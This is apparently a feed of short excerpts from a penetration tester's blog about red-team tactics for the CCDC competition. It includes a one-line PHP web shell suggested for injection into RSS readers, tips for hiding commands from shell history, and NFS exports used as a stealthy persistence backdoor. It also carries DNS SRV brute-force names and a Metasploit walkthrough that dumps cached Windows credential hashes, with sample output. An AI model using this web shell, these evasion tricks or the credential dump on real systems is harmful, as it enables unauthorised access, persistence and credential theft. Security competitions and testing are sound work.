This is mostly for my memory for CCDC <?php system($_GET['cmd']); ?> I wonder what will happen if a RSS reader doesn’t do proper filtering…
CORRECTION: Thanks to jduck for pointing it out, but you need to actually make a change to get this to work, reference: http://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/ and search for: Modifying History Behavior You simply put a space before it mubix@localhost:/tmp/demo$ ls -alh total 8.0K drwxr-xr-x 2 mubix mubix 4.0K Mar 1 19:43 . drwxrwxrwt 3 root root 4.0K Mar 1 19:43 .. -rw-r--r-- 1 mubix mubix 0 Mar 1 19:43 bob mubix@localhost:/tmp/demo$ cat ~/.
Not sure how far back it goes (Win95?) but 2000, XP and all the way up to Win 7 have a program called DOSKEY: C:\Users\vmadmin>doskey /? Edits command lines, recalls Windows commands, and creates macros. DOSKEY [/REINSTALL] [/LISTSIZE=size] [/MACROS[:ALL | :exename]] [/HISTORY] [/INSERT | /OVERSTRIKE] [/EXENAME=exename] [/MACROFILE=filename] [macroname=[text]] /REINSTALL Installs a new copy of Doskey. /LISTSIZE=size Sets size of command history buffer. /MACROS Displays all Doskey macros. /MACROS:ALL Displays all Doskey macros for all executables which have Doskey macros.
Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. However, NFS exports are hardly ever noticed. Setting it up on an Ubuntu/Debian box is a snap and given the right directory and permissions can lead you right back to getting shell any time you want without a constant connection. Plus, NFS blends right in and can listen on TCP and/or UDP (2049) Here is a quick how-to on setting up NFS
(No I’m not old enough to have used that term when it was the standard) I believe that this tweet should be archived for reference: http://twitter.com/#!/_ming_se/status/37688231185219584 And for those who don’t get the reference, here is a Pontiac Fiero:
The following are good adds to your DNS brute force list: These are all SRV records so make sure your type is set correctly. The great thing about SRV records is that it tells you the port in the answer. Isn’t that nice of them? I don’t know of any DNS tools that utilize SRV as part of their process, but scripting dig to do so isn’t tough. _autodiscover._tcp _caldav._tcp _client.
Update: Cachedump has been added to the Metasploit trunk: https://dev.metasploit.com/redmine/projects/framework/repository/revisions/12946 Pull it down: wget http://lab.mediaservice.net/code/cachedump.rb put it here: /(metasploitdir)/modules/post/windows/gather Load up console and pwn something then (MAKE SURE YOU ARE SYSTEM): meterpreter > run post/windows/gather/cachedump [*] Executing module against WORKSTATION244 [*] Obtaining the boot key... [*] Trying 'XP' style... [*] Getting PolSecretEncryptionKey... [*] XP compatible client [*] Lsa Key: 29249a6480f428cb6dacba2d30d5292c [*] Getting LK$KM... [*] Dumping cached credentials... Username : jdoe Hash : 592cdfbc3f1ef77ae95c75f851e37166 Last login : 2010-05-11 01:43:48 DNS Domain Name : CONTOSO.
I thought updates went into RSS, but I guess they don’t so this is my “I updated stuff” post: /blog/2009/9/18/password-word-lists/
Thought I would share this video, if it isn’t a swift kick in the pants to do better with your life I don’t what is:
This day and age everyone is worried about the insider threat. Internal Penetration Testing doesn’t really test what would happen if your janitor got paid 50 bucks to put a USB stick in one of your servers. External Penetration Tests are never scoped for that sort of testing. So what is a company to do? How can they know what the risk is? The answer? Usually they guess or assume. Mostly because they are scared to find out, it’s happened to them before, or one of a million different justifications.